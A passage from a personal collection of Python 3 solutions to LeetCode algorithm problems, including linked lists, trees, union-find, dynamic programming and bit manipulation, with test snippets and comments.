l, r = self.finder(root.left), self.finder(root.right)
if l and r and (not root.left or root.left.val == root.val) and (not root.right or root.right.val == root.val):
self.ans += 1
return True
return False
# @lc code=end
```
#### File: leetcode/Python3/254.factor-combinations.py
```python
class Solution:
def getFactors(self, n: int):
self.ans = []
self.helper(n,[])
return self.ans
def helper(self, n, path):
if not path:
divider = 2
else:
divider = path[-1]
while divider <= n/divider:
if n % divider == 0:
path.append(divider)
path.append(n // divider)
self.ans.append(path.copy())
path.pop()
self.helper(n//divider, path)
path.pop()
divider += 1
if __name__ == '__main__':
a = Solution()
b = a.getFactors(12)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/258.add-digits.py
```python
class Solution:
def addDigits(self, num: int):
if num < 10:
return num
s = 0
while num > 0:
s += num%10
num = num //10
return self.addDigits(s)
# @lc code=end
```
#### File: leetcode/Python3/259.3-sum-smaller.py
```python
class Solution:
def threeSumSmaller(self, nums, target):
if not nums or len(nums) < 3:
return 0
if nums[0] + nums[1] + nums[2] > target:
return 0
nums.sort()
mx = len(nums)
ans = 0
for l in range(0, mx - 2):
if nums[l] + nums[l + 1] + nums[l + 2] >= target:
break
if nums[l] + nums[mx - 2] + nums[mx - 1] < target:
ans += (mx - 1 - l) * (mx - 2 - l) // 2
continue
m = l + 1
r = mx - 1
while m < r:
tmp = nums[l] + nums[m] + nums[r]
if tmp < target:
ans += r - m
m += 1
if tmp >= target:
r -= 1
return ans
# if __name__ == '__main__':
# a = Solution()
# b = a.threeSumSmaller([2,0,0,2,-2], 2)
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/25.reverse-nodes-in-k-group.py
```python
import collections
# Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def reverseKGroup(self, head, k):
dummy = ListNode(0)
dummy.next = head
cur = dummy
tplist = collections.deque()
counter = 0
while head:
            # if the queue is full, pop everything from it so the current node chain links to the reversed group
if counter == k:
while counter > 0:
cur.next = tplist.pop()
cur = cur.next
counter -= 1
# else put things to queue
else:
tplist.append(head)
head = head.next
counter += 1
        # connect the leftover nodes in reverse if they still form a complete group of k
if len(tplist) == k:
while tplist:
cur.next = tplist.pop()
cur = cur.next
cur.next = None
# else connect without reverse
elif len(tplist) > 0:
while tplist:
cur.next = tplist.popleft()
cur = cur.next
return dummy.next
if __name__ == '__main__':
S = Solution()
l1 = ListNode(1)
l2 = ListNode(2)
# l3 = ListNode(3)
# l4 = ListNode(4)
# l5 = ListNode(5)
head = l1
l1.next = l2
l2.next = None
# l3.next = l4
# l4.next = l5
# l5.next = None
a = S.reverseKGroup(head, 2)
print(a)
# @lc code=end
```
#### File: leetcode/Python3/266.palindrome-permutation.py
```python
import collections
class Solution:
def canPermutePalindrome(self, s: str) -> bool:
d = collections.Counter(s)
c = 0
for k, v in d.items():
if v & 1:
if c > 0:
return False
c += 1
return True
# @lc code=end
```
#### File: leetcode/Python3/280.wiggle-sort.py
```python
class Solution:
def wiggleSort(self, nums):
"""
Do not return anything, modify nums in-place instead.
"""
if nums:
nums.sort()
for i in range(1, len(nums) - 1, 2):
nums[i], nums[i + 1] = nums[i + 1], nums[i]
# def swap(ls):
# for i in range(0, len(ls) - 1, 2):
# ls[i], ls[i + 1] = ls[i + 1], ls[i]
# return ls
# if __name__ == '__main__':
# newls = swap([1,2,3,4,5])
# print(newls)
# @lc code=end
```
#### File: leetcode/Python3/28.implement-str-str.py
```python
class Solution:
def strStr(self, haystack: str, needle: str) -> int:
return haystack.find(needle)
# @lc code=end
```
#### File: leetcode/Python3/290.word-pattern.py
```python
class Solution:
def wordPattern(self, pattern, str):
word_ls = str.split(' ')
d = dict()
if len(word_ls) != len(pattern):
return False
for i in range(len(pattern)):
if pattern[i] not in d:
d[pattern[i]] = word_ls[i]
else:
if d[pattern[i]]!=word_ls[i]:
return False
p = list(pattern)
if len(set(p)) != len(set(word_ls)):
return False
return True
if __name__ =='__main__':
a = Solution()
b = a.wordPattern("abba", "dog cat cat dog")
print(b)
# @lc code=end
```
#### File: leetcode/Python3/298.binary-tree-longest-consecutive-sequence.py
```python
class Solution:
def longestConsecutive(self, root: TreeNode):
self.mx = 0
self.dfs(root, float('-inf'), 0)
return self.mx
def dfs(self, node, preval, curlen):
if not node:
self.mx = max(self.mx, curlen)
return
if node.val - preval == 1:
curlen += 1
else:
self.mx = max(self.mx, curlen)
curlen = 1
self.dfs(node.left, node.val, curlen)
self.dfs(node.right, node.val, curlen)
# @lc code=end
```
#### File: leetcode/Python3/29.divide-two-integers.py
```python
class Solution:
def divide(self, dividend, divisor):
if abs(divisor) >abs(dividend):
return 0
count = 0
label = 1
if (dividend > 0 and divisor < 0) or (dividend < 0 and divisor > 0):
label = 0
dividend = abs(dividend)
divisor = abs(divisor)
res = self.helper(dividend, divisor, 0, 0, 0)
if label == 0:
res = -res
if res > 2 ** 31 - 1:
return 2 ** 31 - 1
if res < - 2 ** 31:
return - 2 ** 31
return res
def helper(self, dividend, divisor, current_s, count, temp_count):
# stop recursion
if dividend < divisor:
return count
# stop recursion
if dividend == divisor:
return count + 1
# init
if current_s == 0:
current_s = divisor
# init
if temp_count == 0:
temp_count = 1
        # if the dividend is still larger than twice the current chunk (current_s), double the chunk and its count in the next call
if dividend > current_s + current_s:
return self.helper(dividend - current_s - current_s, divisor, current_s + current_s, count + temp_count + temp_count, temp_count + temp_count)
# if above step fail
if dividend > current_s:
return self.helper(dividend - current_s, divisor, current_s, count + temp_count, temp_count)
# else divisor start from the base divisor
if dividend > divisor:
return self.helper(dividend - divisor, divisor, divisor, count + 1, 1)
if __name__ == '__main__':
a = Solution()
b = a.divide(5, 1)
print(b)
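    # hedged worked example of the doubling idea: for 43 // 5 the helper subtracts
    # chunks of 10 and 20 before falling back to single 5s, accumulating a count of 8
    print(a.divide(43, 5))  # expected: 8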
# @lc code=end
```
#### File: leetcode/Python3/305.number-of-islands-ii.py
```python
# if self.parent[i] != self.parent[self.parent[i]]:
# self.parent[i] = self.get_root(self.parent[i])
# return self.parent[i]
# def isconnected(self, node1, node2):
# return self.getmyroot(node1) == self.getmyroot(node2)
# def union(self, node1, node2):
# root1 = self.getmyroot(node1)
# root2 = self.getmyroot(node2)
# if self.rank[root1] >= self.rank[root2]:
# self.parent[root2] = root1
# self.rank[root1] += 1
# else:
# self.parent[root1] = root2
# self.rank[root2] += 1
# s = set()
# for k, v in self.parent.items():
# s.add(v)
# self.treenum = len(s)
# class Solution:
# def numIslands2(self, m: int, n: int, positions):
# dirs = [(1, 0), (-1, 0), (0, 1), (0, -1)]
# ans = []
# lands = [[0] * n for _ in range(m)]
# uf = uftree(m, n)
# for land in positions:
# lands[land[1]][land[0]] = 1
# uf.addnode(land[0], land[1])
# for d in dirs:
# new_y = land[0] + d[0]
# new_x = land[1] + d[1]
# if 0 <= new_x < n and 0 <= new_y < n:
# if lands[new_y][new_x] == 1:
# node1 = uf.encrypt(new_x, new_y)
# node2 = uf.encrypt(land[1], land[0])
# uf.union(node1, node2)
# ans.append(uf.treenum)
# return ans
# if __name__ == '__main__':
# a = Solution()
# b = a.numIslands2(3, 3, [[0,0], [0,1], [1,2], [2,1]])
# print(b)
class UnionFind:
def __init__(self, m, n):
self.father = {}
for i in range(n):
for j in range(m):
id = self.converttoId(i,j,m);
self.father[id] = id
def converttoId(self, x, y, m):
return x*m + y
def find(self, x):
parent = self.father[x]
while parent != self.father[parent]:
parent = self.father[parent]
return parent
def compressed_find(self, x):
parent = self.father[x]
while parent != self.father[parent]:
parent = self.father[parent]
temp = -1;
fa = self.father[x]
while fa != self.father[fa]:
temp = self.father[fa]
self.father[fa] = parent
fa = temp
return parent
def union(self, x, y):
fa_x = self.find(x)
fa_y = self.find(y)
if fa_x != fa_y:
self.father[fa_x] = fa_y
class Solution:
# @param {int} n an integer
# @param {int} m an integer
# @param {Pint[]} operators an array of point
# @return {int[]} an integer array
def numIslands2(self, n, m, operators):
dx = [0,-1, 0, 1]
dy = [1, 0, -1, 0]
island = [[0 for i in range(m)] for j in range(n)]
ans = []
uf = UnionFind(n, m)
count = 0
if operators != None:
for i in range(len(operators)):
count += 1
x = operators[i][0]
y = operators[i][1]
if island[x][y] != 1:
island[x][y] = 1
id = uf.converttoId(x, y, m)
                    # compute the coordinates of the four adjacent cells (up, down, left, right)
for j in range(4):
nx = x + dx[j]
ny = y + dy[j]
if 0 <= nx and nx < n and 0 <= ny and ny < m and island[nx][ny] == 1:
nid = uf.converttoId(nx, ny, m)
fa = uf.find(id)
nfa = uf.find(nid)
if fa != nfa:
count -= 1
uf.union(id, nid)
else:
count -= 1
ans.append(count)
return ans
if __name__ == '__main__':
a = Solution()
b = a.numIslands2(3, 3, [[0,0], [0,1], [1,2], [1,2]])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/306.additive-number.py
```python
class Solution:
def isAdditiveNumber(self, num: str):
return self.dfs(num, [])
def dfs(self, num, path):
if len(path) >= 3 and path[-3] + path[-2] != path[-1]:
return False
if not num and len(path) >= 3:
return True
for i in range(len(num)):
cur = num[:i + 1]
if cur[0] == '0' and len(cur) != 1:
continue
if self.dfs(num[i + 1:], path + [int(cur)]):
return True
return False
# @lc code=end
```
#### File: leetcode/Python3/311.sparse-matrix-multiplication.py
```python
class Solution(object):
def multiply(self, A, B):
"""
:type A: List[List[int]]
:type B: List[List[int]]
:rtype: List[List[int]]
"""
m, n, l = len(A), len(A[0]), len(B[0])
res = [[0 for _ in range(l)] for _ in range(m)]
for i in range(m):
for k in range(n):
if A[i][k]:
for j in range(l):
res[i][j] += A[i][k] * B[k][j]
return res
# if __name__ =='__main__':
# a = Solution()
# b = a.multiply([[1,0,0],[-1,0,3]], [[7,0,0],[0,0,0],[0,0,1]])
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/319.bulb-switcher.py
```python
import math
class Solution:
def bulbSwitch(self, n: int) -> int:
return int(math.sqrt(n))
# @lc code=end
```
#### File: leetcode/Python3/320.generalized-abbreviation.py
```python
class Solution:
def generateAbbreviations(self, word: str):
if not word:
return [""]
ans = ['']
for i in range(len(word)):
temp = []
for item in ans:
temp.append(item + word[i])
if not item:
temp.append('1')
elif item[-1].isdigit():
temp.append(item[:-1] + str(int(item[-1]) + 1))
else:
temp.append(item + '1')
ans = temp
return ans
if __name__ == '__main__':
a = Solution()
b = a.generateAbbreviations('word')
print(b)
# @lc code=end
```
#### File: leetcode/Python3/322.coin-change.py
```python
import collections
class Solution:
def coinChange(self, coins: List[int], amount: int):
dp = [float('inf')] * (amount + 1)
dp[0] = 0
for i in range(amount + 1):
for j in range(len(coins)):
if coins[j] <= i:
dp[i] = min(dp[i], dp[i - coins[j]] + 1)
if dp[amount] != float('inf'):
return dp[amount]
return -1
# @lc code=end
```
#### File: leetcode/Python3/325.maximum-size-subarray-sum-equals-k.py
```python
class Solution:
def maxSubArrayLen(self, nums, k):
sums = dict()
ans = 0
cursum = 0
for i in range(len(nums)):
cursum += nums[i]
if cursum == k:
ans = i + 1
elif cursum - k in sums:
ans = max(ans, i - sums[cursum - k])
if cursum not in sums:
sums[cursum] = i
return ans
# if __name__ == '__main__':
# a = Solution()
# b = a.maxSubArrayLen([1, 1, 0], 1)
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/326.power-of-three.py
```python
class Solution:
def isPowerOfThree(self, n: int) -> bool:
mx = 3 ** 19
return n > 0 and mx % n == 0
# @lc code=end
```
#### File: leetcode/Python3/328.odd-even-linked-list.py
```python
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def oddEvenList(self, head):
if not head:
return None
counter = 0
odd = ListNode(0)
even = ListNode(0)
oddstart = odd
evenstart = even
while head:
counter += 1
if counter & 1:
odd.next = head
odd = odd.next
else:
even.next = head
even = even.next
head = head.next
even.next = None
odd.next = evenstart.next
return oddstart.next
# @lc code=end
```
#### File: leetcode/Python3/32.longest-valid-parentheses.py
```python
class Solution:
def longestValidParentheses(self, s):
if not s:
return 0
l = 0
r = len(s)
while s[r - 1] == '(' and r > 0:
r -= 1
while s[l] == ')' and l < r - 2:
l += 1
s = s[l : r]
if len(s) < 2:
return 0
stack = [-1]
mx = 0
for i, p in enumerate(s):
if p == '(':
stack.append(i)
elif p == ')':
stack.pop()
if not stack:
stack.append(i)
else:
mx = max(mx, i - stack[-1])
return mx
# @lc code=end
```
#### File: leetcode/Python3/332.reconstruct-itinerary.py
```python
import collections
class Solution:
def findItinerary(self, tickets):
graph = collections.defaultdict(list)
city_counter = len(tickets) + 1
for pair in tickets:
graph[pair[0]].append(pair[1])
for k, v in graph.items():
v.sort(reverse = True)
res = []
self.dfs(graph, "JFK", res)
return res[::-1]
def dfs(self, graph, frm, res):
while graph[frm]:
nxt = graph[frm].pop()
self.dfs(graph, nxt, res)
res.append(frm)
# @lc code=end
if __name__ == '__main__':
a = Solution()
b = a.findItinerary([["JFK","SFO"],["JFK","ATL"],["SFO","ATL"],["ATL","JFK"],["ATL","SFO"]])
print(b)
```
#### File: leetcode/Python3/341.flatten-nested-list-iterator.py
```python
class NestedIterator:
def __init__(self, nestedList: [NestedInteger]):
self.ls = []
self.pos = 0
def getele(nest):
for ele in nest:
if ele.isInteger():
self.ls.append(ele)
else:
getele(ele.getList())
getele(nestedList)
def next(self) -> int:
if self.ls:
tmp = self.ls[self.pos]
self.pos += 1
return tmp
def hasNext(self) -> bool:
if self.pos < len(self.ls):
return True
return False
# Your NestedIterator object will be instantiated and called as such:
# i, v = NestedIterator(nestedList), []
# while i.hasNext(): v.append(i.next())
# @lc code=end
```
#### File: leetcode/Python3/361.bomb-enemy.py
```python
class Solution:
def maxKilledEnemies(self, grid: List[List[str]]) -> int:
def count(x, y):
left, right, up, down = 0, 0, 0, 0
for i in range(x-1, -1, -1):
if grid[i][y] == 'W':
break
if grid[i][y] == 'E':
left += 1
for i in range(x+1, row):
if grid[i][y] == 'W':
break
if grid[i][y] == 'E':
right += 1
for j in range(y+1, col):
if grid[x][j] == 'W':
break
if grid[x][j] == 'E':
up += 1
for j in range(y-1, -1, -1):
if grid[x][j] == 'W':
break
if grid[x][j] == 'E':
down += 1
return left+right+up+down
if not grid:
return 0
row, col = len(grid), len(grid[0])
ans = 0
for i in range(row):
for j in range(col):
if grid[i][j] == '0':
# count the num of enemies
ans = max(ans, count(i, j))
return ans
# @lc code=end
```
#### File: leetcode/Python3/371.sum-of-two-integers.py
```python
class Solution:
def getSum(self, a, b):
mask = (1 << 32) - 1
while (b & mask) > 0:
mid = (a & b) << 1
a = a ^ b
b = mid
if b > 0:
return a & mask
return a
if __name__ == '__main__':
a = Solution()
b = a.getSum(2,3)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/374.guess-number-higher-or-lower.py
```python
class Solution:
def guessNumber(self, n: int):
def binarysearch(start, end):
mid = (start + end)//2
if guess(mid) == 0:
return mid
elif guess(mid) == 1:
return binarysearch(mid + 1, end)
else:
return binarysearch(start, mid)
return binarysearch(1, n + 1)
# @lc code=end
```
#### File: leetcode/Python3/375.guess-number-higher-or-lower-ii.py
```python
class Solution(object):
def getMoneyAmount(self, n):
"""
:type n: int
:rtype: int
"""
dp = [[0] * (n + 1) for _ in range(n + 1)]
res = self.solve(dp, 1, n)
return res
def solve(self, dp, L, R):
if L >= R: return 0
if dp[L][R]: return dp[L][R]
dp[L][R] = min(i + max(self.solve(dp, L, i - 1), self.solve(dp, i + 1, R)) for i in range(L, R + 1))
return dp[L][R]
if __name__ == '__main__':
a = Solution()
b = a.getMoneyAmount(10)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/380.insert-delete-get-random-o-1.py
```python
import random
class RandomizedSet:
def __init__(self):
"""
Initialize your data structure here.
"""
self.d = dict()
self.vals = []
self.length = 0
def insert(self, val: int):
"""
Inserts a value to the set. Returns true if the set did not already contain the specified element.
"""
if val not in self.d:
self.d[val] = self.length
self.length += 1
self.vals.append(val)
return True
return False
def remove(self, val: int):
"""
Removes a value from the set. Returns true if the set contained the specified element.
"""
if val in self.d:
idx = self.d.pop(val)
self.vals[idx] = self.vals[-1]
self.vals.pop()
if idx != len(self.vals):
self.d[self.vals[idx]] = idx
self.length -= 1
return True
return False
def getRandom(self):
"""
Get a random element from the set.
"""
idx = random.randint(0, self.length - 1)
return self.vals[idx]
# Your RandomizedSet object will be instantiated and called as such:
# obj = RandomizedSet()
# param_1 = obj.insert(val)
# param_2 = obj.remove(val)
# param_3 = obj.getRandom()
# @lc code=end
```
#### File: leetcode/Python3/381.insert-delete-get-random-o-1-duplicates-allowed.py
```python
import random
import collections
class RandomizedCollection:
def __init__(self):
"""
Initialize your data structure here.
"""
self.valList = list()
self.valToIndices = collections.defaultdict(set)
def insert(self, val):
"""
Inserts a value to the collection. Returns true if the collection did not already contain the specified element.
:type val: int
:rtype: bool
"""
ret = ( val in self.valToIndices )
self.valToIndices[ val ].add( len(self.valList) )
        self.valList.append( val )
        return not ret  # True if the collection did not already contain val
def remove(self, val):
"""
Removes a value from the collection. Returns true if the collection contained the specified element.
:type val: int
:rtype: bool
"""
if val not in self.valToIndices:
return False
if self.valList[-1] == val: # easy case, last one is val, so we simply remove last one
self.valList.pop()
self.valToIndices[val].remove( len(self.valList) )
else:
# difficult case, last one is not val, so we need to find a index of val, and make that index have lastVal
lastVal = self.valList.pop()
self.valToIndices[ lastVal ].remove( len(self.valList) )
swapIdx = self.valToIndices[ val ].pop()
self.valList[ swapIdx ] = lastVal
self.valToIndices[ lastVal ].add( swapIdx )
if not self.valToIndices[val]:
del self.valToIndices[ val ]
return True
def getRandom(self):
"""
Get a random element from the collection.
:rtype: int
"""
return random.choice( self.valList )
# Your RandomizedCollection object will be instantiated and called as such:
# obj = RandomizedCollection()
# obj.insert(4)
# obj.insert(3)
# obj.insert(4)
# obj.insert(2)
# obj.insert(4)
# obj.remove(4)
# obj.remove(3)
# obj.remove(4)
# obj.remove(4)
# @lc code=end
def regularize(lsofls, reg = False):
# if reg == True
if reg:
for ls in lsofls:
divider = sum(ls)
for i in range(len(ls)):
                # divide each element by the sum of the current list, modifying it in place
                # remember, the original problem requires keeping 4 decimal places, so use round
ls[i] = round(ls[i]/divider, 4)
return lsofls
# else if reg == False, do nothing.
return lsofls
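if __name__ == '__main__':
    # hedged usage sketch for regularize() with illustrative values
    print(regularize([[1, 1, 2]], reg=True))  # expected: [[0.25, 0.25, 0.5]]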
```
#### File: leetcode/Python3/38.count-and-say.py
```python
class Solution:
def countAndSay(self, n):
if n == 1:
return '1'
init = '1'
for _ in range(1, n):
init = self.helper(init)
return init
def helper(self, s):
counter = 1
res = ""
label = 0
for i in range(len(s) - 1):
if s[i] == s[i + 1]:
counter += 1
label = 0
else:
res = res + str(counter) + str(s[i])
counter = 1
label = 1
if label == 1:
res = res + '1' + str(s[len(s) - 1])
else:
res = res + str(counter) + str(s[len(s) - 1])
return res
# @lc code=end
```
#### File: leetcode/Python3/392.is-subsequence.py
```python
class Solution:
def isSubsequence(self, s, t):
if len(s) == 0:
return True
if len(t) == 0:
return False
for i in range(len(t)):
if s[0] == t[i]:
return self.isSubsequence(s[1:], t[i + 1 :])
return False
if __name__ == '__main__':
a = Solution()
b = a.isSubsequence("abc", "ahbgdc")
print(b)
# @lc code=end
```
#### File: leetcode/Python3/39.combination-sum.py
```python
class Solution:
def combinationSum(self, candidates, target):
if len(candidates) == 0:
return []
candidates.sort()
self.ans = []
self.helper(candidates, [], target, 0)
return self.ans
def helper(self, candidates, ls, remain, last_num):
if remain == 0 :
self.ans.append(ls)
if remain < candidates[0]:
return
for item in candidates:
if item > remain:
return
if item < last_num:
continue
self.helper(candidates, ls + [item], remain - item, item)
if __name__ == '__main__':
a = Solution()
b = a.combinationSum([10,1,2,7,6,1,5], 8)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/416.partition-equal-subset-sum.py
```python
class Solution:
def canPartition(self, nums):
"""
:type nums: List[int]
:return: bool
"""
s = sum(nums)
# if sum is an odd number
if s & 1:
return False
target = s//2
if max(nums) > target:
return False
nums.sort(reverse = True)
return self.dfs(nums, 0, target)
def dfs(self, nums, idx, target):
if target == 0:
return True
if target < 0:
return
for i in range(idx, len(nums)):
if self.dfs(nums, i + 1, target - nums[i]):
return True
return False
# class Solution:
# def canPartition(self, nums):
# """
# :type nums: List[int]
# :rtype: bool
# """
# def dfs(start, target):
# if target < 0:
# return
# if target == 0:
# return True
# for i in range(start, len(nums)):
# if dfs(i+1, target - nums[i]):
# return True
# return False
# s = sum(nums)
# if s % 2 != 0:
# return False
# nums.sort(reverse = True)
# return dfs(0, s//2)
a = Solution()
b = a.canPartition([2, 2, 1, 1])
print(b)
# class Solution:
# def canPartition(self, nums: List[int]) -> bool:
# #Time Complexity: O(n)
# #Space Complexity: O(n)
# Sum = sum(nums)
# if Sum % 2 == 1:
# return False
# Sum = Sum//2
# n = len(nums)
# dp = [0]*(Sum+1)
# dp[0] = 1
# for i in range(1, n+1):
# dp_new = dp.copy()
# for j in range(1, Sum+1):
# if j - nums[i-1] >= 0 and dp[j-nums[i-1]]:
# dp_new[j] = 1
# dp = dp_new
# return dp[-1]
# @lc code=end
```
#### File: leetcode/Python3/421.maximum-xor-of-two-numbers-in-an-array.py
```python
class Solution:
def findMaximumXOR(self, nums: List[int]):
ans = 0
mask = 0
for i in range(31, -1, -1):
mask |= 1 << i
pre = {num & mask for num in nums}
curguess = ans | 1 << i
for prefix in pre:
if prefix ^ curguess in pre:
ans = curguess
break
return ans
# @lc code=end
```
#### File: leetcode/Python3/426.convert-binary-search-tree-to-sorted-doubly-linked-list.py
```python
class Solution:
def treeToDoublyList(self, root: 'Node'):
if not root:
return
self.vals = []
self.travel_tree(root)
head = Node(0)
prenode = head
for val in self.vals:
curnode = Node(val)
curnode.left = prenode
if prenode:
prenode.right = curnode
prenode = curnode
prenode.right = head.right
head.right.left = prenode
return head.right
def travel_tree(self, node):
if not node:
return
self.travel_tree(node.left)
self.vals.append(node.val)
self.travel_tree(node.right)
# @lc code=end
```
#### File: leetcode/Python3/429.n-ary-tree-level-order-traversal.py
```python
import collections
class Solution(object):
def levelOrder(self, root):
"""
:type root: Node
:rtype: List[List[int]]
"""
res = []
que = collections.deque()
que.append(root)
while que:
level = []
size = len(que)
for _ in range(size):
node = que.popleft()
if not node:
continue
level.append(node.val)
for child in node.children:
que.append(child)
if level:
res.append(level)
return res
# @lc code=end
```
#### File: leetcode/Python3/42.trapping-rain-water.py
```python
class Solution:
def trap(self, height: List[int]) -> int:
if not height:
return 0
vol = 0
l = len(height)
left = l * [0]
right = l * [0]
left[0] = height[0]
for i in range(1, l):
left[i] = max(height[i], left[i - 1])
right[l-1] = height[l - 1]
for i in range(l -2, -1, -1):
right[i] = max(right[i + 1], height[i])
for i in range(1, l-1):
vol += min(left[i], right[i]) - height[i]
return vol
# @lc code=end
```
#### File: leetcode/Python3/430.flatten-a-multilevel-doubly-linked-list.py
```python
class Solution:
def flatten(self, head: 'Node') -> 'Node':
if not head:
return
save_ls = []
pointer = head
def traveller(head):
if head.child:
if head.next:
save_ls.append(head.next)
head.next = head.child
head.child = None
head.next.prev = head
head = head.next
elif head.next:
head = head.next
elif save_ls:
newnxt = save_ls.pop()
head.next = newnxt
newnxt.prev = head
head = newnxt
else:
return
traveller(head)
traveller(pointer)
return head
# @lc code=end
```
#### File: leetcode/Python3/447.number-of-boomerangs.py
```python
import collections
# @lc code=start
class Solution:
def numberOfBoomerangs(self, points):
"""
:type points: List[List[int]]
:rtype: int
"""
res = 0
for p0 in points:
d = collections.defaultdict(int)
for p1 in points:
d[(p0[0] - p1[0]) ** 2 + (p0[1] - p1[1]) ** 2] += 1
for d, v in d.items():
res += v * (v - 1)
        return res
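# quick sanity check: with three collinear, evenly spaced points, only the middle
# point forms boomerangs (two of them), so the expected answer is 2
# a = Solution()
# print(a.numberOfBoomerangs([[0, 0], [1, 0], [2, 0]]))   # expected 2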
# @lc code=end
```
#### File: leetcode/Python3/461.hamming-distance.py
```python
class Solution:
def hammingDistance(self, x: int, y: int):
if x == y:
return 0
cnt = 0
while x > 0 or y > 0:
if x & 1 != y & 1:
cnt += 1
x = x >> 1
y = y >> 1
return cnt
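# quick sanity check: 1 (001) and 4 (100) differ in two bit positions
# a = Solution()
# print(a.hammingDistance(1, 4))   # expected 2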
# @lc code=end
```
#### File: leetcode/Python3/462.minimum-moves-to-equal-array-elements-ii.py
```python
class Solution:
def minMoves2(self, nums: List[int]) -> int:
l = 0
r = len(nums) - 1
ans = 0
nums.sort()
while l < r:
ans += nums[r] - nums[l]
r -= 1
l += 1
return ans
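# quick sanity check: for [1, 2, 3] everything can meet at the median 2 in two moves
# a = Solution()
# print(a.minMoves2([1, 2, 3]))   # expected 2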
# @lc code=end
```
#### File: leetcode/Python3/474.ones-and-zeroes.py
```python
import collections
# @lc code=start
class Solution:
def findMaxForm(self, strs, m, n):
"""
:type strs: List[str]
:type m: int
:type n: int
:rtype: int
"""
dp = [[0 for _ in range(n + 1)] for _ in range(m + 1)]
for str in strs:
zeros, ones = 0, 0
for c in str:
if c == "0":
zeros += 1
elif c == "1":
ones += 1
for i in range(m, zeros - 1, -1):
for j in range(n, ones - 1, -1):
dp[i][j] = max(dp[i][j], dp[i - zeros][j - ones] + 1)
return dp[m][n]
# @lc code=end
```
#### File: leetcode/Python3/47.permutations-ii.py
```python
class Solution:
def permuteUnique(self, nums) :
if nums == []:
return []
# sort it first for prev to work
nums.sort()
self.ans = []
self.dfs(nums ,[])
return self.ans
def dfs(self, nums, ls):
        # you can also use None or anything that will never equal a number inside nums
prev = float('inf')
if not nums:
self.ans.append(ls)
for i in range(len(nums)):
# example: for [1,1,2], the second '1' will be skipped
if nums[i] == prev:
continue
prev = nums[i]
self.dfs(nums[:i] + nums[i + 1:len(nums)], ls + [nums[i]])
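# quick sanity check: [1, 1, 2] has exactly three distinct permutations
# a = Solution()
# print(a.permuteUnique([1, 1, 2]))   # expected [[1, 1, 2], [1, 2, 1], [2, 1, 1]]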
# @lc code=end
```
#### File: leetcode/Python3/497.random-point-in-non-overlapping-rectangles.py
```python
class Solution:
def __init__(self, rects):
"""
:type rects: List[List[int]]
"""
self.rects = rects
self.N = len(rects)
areas = [(x2 - x1 + 1) * (y2 - y1 + 1) for x1, y1, x2, y2 in rects]
self.preSum = [0] * self.N
self.preSum[0] = areas[0]
for i in range(1, self.N):
self.preSum[i] = self.preSum[i - 1] + areas[i]
self.total = self.preSum[-1]
def pickRect(self):
rand = random.randint(0, self.total - 1)
return bisect.bisect_right(self.preSum, rand)
def pickPoint(self, rect):
x1, y1, x2, y2 = rect
x = random.randint(x1, x2)
y = random.randint(y1, y2)
return x, y
def pick(self):
"""
:rtype: List[int]
"""
rectIndex = self.pickRect()
rect = self.rects[rectIndex]
return self.pickPoint(rect)
# Your Solution object will be instantiated and called as such:
# obj = Solution(rects)
# param_1 = obj.pick()
# @lc code=end
```
#### File: leetcode/Python3/500.keyboard-row.py
```python
class Solution:
def findWords(self, words):
"""
:type words: List[str]
:rtype: List[str]
"""
rowdict = {}
for c in "qwertyuiopQWERTYUIOP":
rowdict[c] = 1
for c in "asdfghjklASDFGHJKL":
rowdict[c] = 2
for c in "zxcvbnmZXCVBNM":
rowdict[c] = 3
res = []
for word in words:
if len(set(rowdict[c] for c in word)) == 1:
res.append(word)
return res
# @lc code=end
```
#### File: leetcode/Python3/503.next-greater-element-ii.py
```python
class Solution:
def nextGreaterElements(self, nums: List[int]) -> List[int]:
records = []
l = len(nums)
res = [-1] * l
for i in range(l * 2):
i = i % l
while records and nums[records[-1]] < nums[i]:
res[records.pop()] = nums[i]
records.append(i)
return res
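# quick sanity check on a circular array: the trailing 1 wraps around and finds 2
# a = Solution()
# print(a.nextGreaterElements([1, 2, 1]))   # expected [2, -1, 2]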
# @lc code=end
```
#### File: leetcode/Python3/513.find-bottom-left-tree-value.py
```python
class Solution:
def findBottomLeftValue(self, root: TreeNode) -> int:
self.ans = [None, float('inf'), float('-inf')]
self.finder(root, 0, 0)
return self.ans[0]
def finder(self, root, x, y):
if not root:
return
if y > self.ans[2]:
self.ans = [root.val, x, y]
elif y == self.ans[2]:
if x < self.ans[1]:
self.ans = [root.val, x, y]
self.finder(root.left, x - 1, y + 1)
self.finder(root.right, x + 1, y + 1)
# @lc code=end
```
#### File: leetcode/Python3/532.k-diff-pairs-in-an-array.py
```python
import collections
class Solution:
def findPairs(self, nums, k):
if k == 0:
counter = collections.Counter(nums)
ans = 0
for k in counter:
if counter[k] > 1:
ans += 1
return ans
nums = list(set(nums))
nums.sort()
ans = 0
i = 0
j = 1
while i < j and j < len(nums):
if nums[j] - nums[i] < k:
j += 1
elif nums[j] - nums[i] > k:
i += 1
if i == j:
j += 1
else:
if nums[j] - nums[i] == k:
ans += 1
i += 1
j += 1
return ans
if __name__ == '__main__':
a = Solution()
b = a.findPairs([1, 2, 3, 4, 5], k = 1)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/536.construct-binary-tree-from-string.py
```python
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def str2tree(self, s: str) -> TreeNode:
if not s:
return None
stack,number=[],''
for c in s:
if c in '()':
if c=='(' and number:
                    stack.append(TreeNode(int(number)))  # store ints, not strings
number=''
elif c==')':
if number:
                        node,parent=TreeNode(int(number)),stack[-1]
number=''
else:
node,parent=stack.pop(),stack[-1]
if parent.left:
parent.right=node
else:
parent.left=node
else:
number+=c
if number:
            stack=[TreeNode(int(number))]
return stack[0]
# @lc code=end
```
#### File: leetcode/Python3/543.diameter-of-binary-tree.py
```python
class Solution:
def diameterOfBinaryTree(self, root):
self.ans = 0
self.pathfinder(root)
return self.ans
def pathfinder(self, root):
if root is None:
return 0
lh = self.pathfinder(root.left)
rh = self.pathfinder(root.right)
